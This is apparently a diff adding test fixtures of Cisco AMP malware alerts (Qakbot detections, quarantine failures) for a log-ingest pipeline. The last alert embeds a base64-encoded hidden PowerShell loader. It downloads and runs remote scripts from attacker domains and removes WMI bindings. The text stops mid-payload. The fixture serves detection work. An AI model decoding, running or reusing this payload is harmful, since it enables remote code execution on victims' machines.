found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6412622782676337000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412622782676336647",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:35:01.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500178843Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6412622782676337000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412622782676336646",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:35:01.000Z",
+            "file": {
+                "name": "kepv86368.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe",
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500180907Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6412622782676337000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D177E09A9A-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412622782676336647",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:35:01.000Z",
+            "file": {
+                "name": "uqlq0o884.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe",
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500182993Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6412622782676337000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D177E09A9A-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412622782676336646",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:35:01.000Z",
+            "file": {
+                "name": "120C.tmp",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp",
+                "hash": {
+                    "sha1": "f5a171c879b90e77861daf19741b373646d791ff",
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "md5": "32c9e6737dbdcbfb7563a3f27e2b1571"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "32c9e6737dbdcbfb7563a3f27e2b1571",
+                    "f5a171c879b90e77861daf19741b373646d791ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500185061Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6412622782676337000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D177E09A9A-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412622782676336645",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:35:01.000Z",
+            "file": {
+                "name": "QuotaGroup.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe",
+                "hash": {
+                    "sha1": "92673dd0e5f4a094fa6cd57bb301f884f2289f6c",
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "md5": "2f99e3456dc1d26f77c52b2119fde92f"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
+                    "2f99e3456dc1d26f77c52b2119fde92f",
+                    "92673dd0e5f4a094fa6cd57bb301f884f2289f6c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500187130Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6412622782676337000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.D177E09A9A-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412622782676336644",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:14:44.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_BP_WMIPRVSE"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_BP_WMIPRVSE",
+                "hostname": "Demo_BP_WMIPRVSE"
+            },
+            "event": {
+                "severity": 2,
+                "action": "Threat Detection",
+                "ingested": "2021-09-12T17:31:54.500189198Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsAD